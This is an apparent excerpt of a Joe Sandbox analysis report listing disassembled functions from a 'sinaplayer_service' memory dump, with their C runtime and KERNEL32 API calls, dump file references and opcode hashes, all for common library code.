                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$??0critical_section@??0event@?set@event@Base::Concurrency::details::ContextCreateH_prolog3QueueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 639136014-0
                                                                                                                                                                                                    • Opcode ID: dfc434d4f806aecfd44a8b745ccef3eb9739b52a0124f9115378a531915d6e40
                                                                                                                                                                                                    • Instruction ID: 7102d4c221b1fe91a02b2e5ac44c600106617567c296469db02444160dec7f47
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfc434d4f806aecfd44a8b745ccef3eb9739b52a0124f9115378a531915d6e40
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A92129B0904B018FE365CF39C14076AB7F0BF44714F21891EC5AA8BA50EB74E545CB84
                                                                                                                                                                                                    Function 6D0A3D39 Relevance: 6.1, APIs: 4, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0A3D40
                                                                                                                                                                                                    • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR120(6D0948CA,00000000,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0A3D69
                                                                                                                                                                                                    • memcpy.MSVCR120(6D0948CA,00000000,00000028,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0D3017
                                                                                                                                                                                                      • Part of subcall function 6D0A6A07: __EH_prolog3.LIBCMT ref: 6D0A6A0E
                                                                                                                                                                                                      • Part of subcall function 6D0A6A07: ??2@YAPAXI@Z.MSVCR120(00000210,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?,6D0A3A7E,?,6D0948CA), ref: 6D0A6A75
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120(E18D5491,?,00000180,?), ref: 6D0A5027
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ??_U@YAPAXI@Z.MSVCR120(00000000,E18D5491,?,00000180,?), ref: 6D0A5059
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50A3
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50BB
                                                                                                                                                                                                      • Part of subcall function 6D0A4FC6: memset.MSVCR120(?,00000000,?), ref: 6D0A50D1
                                                                                                                                                                                                    • free.MSVCR120(6D0948CA,?,6D0948CA), ref: 6D0A3DA3
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@H_prolog3$??2@Count@FreeHeapNodePolicy@ProcessorSchedulerfreememcpymemset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3530969603-0
                                                                                                                                                                                                    • Opcode ID: 41ebdbe0cf96b3e9d560b8e9c9c49d7374f4e26a1ca1dc72a21b66ccc570e198
                                                                                                                                                                                                    • Instruction ID: 9b9f90265cbc620efe3147bcbe2f8eb30e6801235348a79cace5995378f9329e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41ebdbe0cf96b3e9d560b8e9c9c49d7374f4e26a1ca1dc72a21b66ccc570e198
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D011E030E08205CFFF14CFA9E890B6D73B0BF49705F58442DE6049B291DBB299048B41
                                                                                                                                                                                                    Function 6D09F41F Relevance: 6.1, APIs: 4, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • realloc.MSVCR120(00000000,00000002,00000000,005C2A20,00000000,?,6D1202D9,00000000,005C2D90,00000002,005C2A20,00000000,?,6D0E070E,00000004,00000002), ref: 6D09F44F
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000002,00000000,005C2A20,00000000,?,6D1202D9,00000000,005C2D90,00000002,005C2A20,00000000,?,6D0E070E,00000004), ref: 6D09F469
                                                                                                                                                                                                    • _errno.MSVCR120(005C2A20,00000000,?,6D1202D9,00000000,005C2D90,00000002,005C2A20,00000000,?,6D0E070E,00000004,00000002,005C2D90,00000000,00000000), ref: 6D0DDBB6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errnomemsetrealloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2569514189-0
                                                                                                                                                                                                    • Opcode ID: 7788a2a31bc3e58c1b96d153f0ab21eac97cae70060ea68fce9576e31dbc2c13
                                                                                                                                                                                                    • Instruction ID: f9cfb99c2be17b129103a761db5baaf41a12083b172441f4014ef1a5b2273fcc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7788a2a31bc3e58c1b96d153f0ab21eac97cae70060ea68fce9576e31dbc2c13
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0F97370C316ABFB109969AC80F5B3B9CAB852B4B115522F9149F144DA30D40016B0
                                                                                                                                                                                                    Function 6D0ACFF8 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0ACFFF
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000004,6D0AD125,00000000,?,00000001,?), ref: 6D0AD02E
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000009,00000001,00000004,6D0AD125,00000000,?,00000001,?), ref: 6D0D3978
                                                                                                                                                                                                    • memcpy.MSVCR120(?,00000000,00000003,00000004,6D0AD125,00000000,?,00000001,?,?,00000001), ref: 6D0D399F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AdjustPointer$H_prolog3_catchmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 738859832-0
                                                                                                                                                                                                    • Opcode ID: d42c19086d042ca48bae8c2d20c092cb3ce364f9539de55816ac6062d89d4b4a
                                                                                                                                                                                                    • Instruction ID: f4ff46bd9d43a048a3d5c21e6728dd2e7818e8100f8a87501753c8fcdb5586b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d42c19086d042ca48bae8c2d20c092cb3ce364f9539de55816ac6062d89d4b4a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0401A1B1508209BAFF154F20C800FAE7BA5EF44314F15940DFE605E0A2D7B6D990EB21
                                                                                                                                                                                                    Function 6D0F87CF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F87D6
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F87ED
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: __EH_prolog3.LIBCMT ref: 6D0EA0FD
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: InterlockedPopEntrySList.KERNEL32(?,00000004,6D0F8775,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EA11A
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: ??2@YAPAXI@Z.MSVCR120(00000074,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0EA134
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000090,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0F8826
                                                                                                                                                                                                    • Concurrency::details::_TaskCollection::_TaskCollection.LIBCMT ref: 6D0F883B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@H_prolog3Task$Base::CollectionCollection::_Concurrency::details::Concurrency::details::_ContextCreateEntryInterlockedListQueueValueWork
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1426128297-0
                                                                                                                                                                                                    • Opcode ID: 8360c9c158949a29aa7193997903daef0d5883020a657583813685d84430eea9
                                                                                                                                                                                                    • Instruction ID: b04311c018dfb56d5e533907b7961c66309ac5d403c20a7af1afe20eac456a5b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8360c9c158949a29aa7193997903daef0d5883020a657583813685d84430eea9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB0175747087429BFB10DA798880BAE76E5BF88314B21492DEA61DF281DB70D8438751
                                                                                                                                                                                                    Function 6D0A83EE Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetUserDefaultLocaleName.MSVCR120(?,00000055,0000009C), ref: 6D0A8415
                                                                                                                                                                                                    • wcslen.MSVCR120(?,0000009C), ref: 6D0A8428
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,00000055,?,00000001,?,0000009C), ref: 6D0A843F
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0000009C), ref: 6D0E044F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DefaultLocaleNameUser__crt_invoke_watsonwcslenwcsncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2957291394-0
                                                                                                                                                                                                    • Opcode ID: ce51ad069b1d431306d78ec6ad816ef1c44cb980a6135d92092ddda3eddebc19
                                                                                                                                                                                                    • Instruction ID: 888650e37d2fba77984419dfe5121b5e1192347dbde6b0ae5e63ee12afdb40c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce51ad069b1d431306d78ec6ad816ef1c44cb980a6135d92092ddda3eddebc19
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F01F4B29042096BEB10DAB0DD45FEB73ECEB04704F54089AEB09D7080FB70EA444BA1
                                                                                                                                                                                                    Function 6D0AE996 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock_file.MSVCR120(?,6D0AEA10,0000000C,6D0AEA44,Function_0001D315,?,?,00000000,?), ref: 6D0AE9CC
                                                                                                                                                                                                      • Part of subcall function 6D094B96: _lock.MSVCR120(?), ref: 6D094BC1
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _fileno.MSVCR120(?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A047F
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: _isatty.MSVCR120(00000000,?,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0485
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A0491
                                                                                                                                                                                                      • Part of subcall function 6D0A0477: __p__iob.MSVCR120(0000FFFF,?,?,6D0A07F9,-00000020,6D0A0850,00000010), ref: 6D0A04A1
                                                                                                                                                                                                    • __ftbuf.LIBCMT ref: 6D0AE9F2
                                                                                                                                                                                                      • Part of subcall function 6D0AE98E: _unlock_file.MSVCR120(?,6D0AEA06), ref: 6D0AE98F
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AEA10,0000000C,6D0AEA44,Function_0001D315,?,?,00000000,?), ref: 6D0D5CBA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AEA10,0000000C,6D0AEA44,Function_0001D315,?,?,00000000,?), ref: 6D0D5CC5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob$__ftbuf_errno_fileno_invalid_parameter_noinfo_isatty_lock_lock_file_unlock_file
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 169382274-0
                                                                                                                                                                                                    • Opcode ID: a57e7c8181beb771239b13eb497ba1e354c03839f4e2a959374573af000ae333
                                                                                                                                                                                                    • Instruction ID: d63d5bea199cbda697e13e256af15c09adb4eb83f364097dee5a8f0e4fce4979
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a57e7c8181beb771239b13eb497ba1e354c03839f4e2a959374573af000ae333
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA01A271A0430AABFB019FB18C05BBF36B0BF45368F058528F920DB291DB38C5119B61
                                                                                                                                                                                                    Function 6D0B433E Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000001), ref: 6D0B4345
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • fclose.MSVCR120(6D15E000), ref: 6D0D5369
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6D15DFE0), ref: 6D0D5389
                                                                                                                                                                                                    • free.MSVCR120(005C7910), ref: 6D0D5397
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$DeleteEnter_lockfclosefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1929256606-0
                                                                                                                                                                                                    • Opcode ID: d3f8c279803425815de333c4fb52fa1fbd4b2310a3bc0290e9279e924dd0163b
                                                                                                                                                                                                    • Instruction ID: f9f4269c6cefc2c6f25cdb53f225a85273d8b84aec034ea596577d48e7ab9347
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3f8c279803425815de333c4fb52fa1fbd4b2310a3bc0290e9279e924dd0163b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF018075818312DBEB01CB99D848F6DB7B0EF57324B520546E9719B191C7B4C4828B41
                                                                                                                                                                                                    Function 6D0F842F Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F8436
                                                                                                                                                                                                    • ??0event@Concurrency@@QAE@XZ.MSVCR120(?,?,?,?,?,00000004), ref: 6D0F845F
                                                                                                                                                                                                      • Part of subcall function 6D0EB72C: ??0critical_section@Concurrency@@QAE@XZ.MSVCR120(00000000,6D0F86D2,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB73C
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • ?set@event@Concurrency@@QAEXXZ.MSVCR120(?,?,?,?,?,00000004), ref: 6D0F8493
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: __EH_prolog3_GS.LIBCMT ref: 6D0EB929
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EB950
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: std::exception::exception.LIBCMT(?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EB9D7
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: _CxxThrowException.MSVCR120(?,6D0AC7FC,?,00000001,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?), ref: 6D0EB9EC
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR120(?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EBA39
                                                                                                                                                                                                      • Part of subcall function 6D0EB922: _freea_s.MSVCR120(?,?,00000044,6D0F8727,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?), ref: 6D0EBA50
                                                                                                                                                                                                      • Part of subcall function 6D0A3AF4: TlsGetValue.KERNEL32(6D0A3DF7,00000000,00000000,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D0A3AFA
                                                                                                                                                                                                    • Concurrency::details::ContextBase::CreateWorkQueue.LIBCMT ref: 6D0F84A9
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: __EH_prolog3.LIBCMT ref: 6D0EA0FD
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: InterlockedPopEntrySList.KERNEL32(?,00000004,6D0F8775,00000004,6D0F8840,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215), ref: 6D0EA11A
                                                                                                                                                                                                      • Part of subcall function 6D0EA0F6: ??2@YAPAXI@Z.MSVCR120(00000074,?,00000001,?,00000004,6D0F931D,?,?,6D0E923C,?,?,6D0F9215,?,?), ref: 6D0EA134
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency@@$H_prolog3Value$??0critical_section@??0event@??0scoped_lock@critical_section@??2@?set@event@?unlock@critical_section@Base::Concurrency::details::ContextCreateEntryExceptionH_prolog3_InterlockedListQueueThrowV12@@Work_freea_sstd::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3177246685-0
                                                                                                                                                                                                    • Opcode ID: 9f8ca712344a6ff21877f5d06c4a17be7f13941749e34f415dfb9850d5226998
                                                                                                                                                                                                    • Instruction ID: 5fb5a399ba4a89c28126e6604dd718f2f55498ca1cbd6f7819464ea4e7225a95
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f8ca712344a6ff21877f5d06c4a17be7f13941749e34f415dfb9850d5226998
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D81105B0A04B02AFD704DF3AC180658FBF0BF48314BA1962EC2698BB50DB74E560DF84
                                                                                                                                                                                                    Function 6D0FBD0B Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?,?,00000000,?,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBCC8
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000,?,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBCCF
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(6D15FCB0,00000000,?,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBCF1
                                                                                                                                                                                                    • __crtFlsFree.MSVCR120(00000007,6D0D3D52,6D0ACA91,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0FBD16
                                                                                                                                                                                                    Memory Dump Source
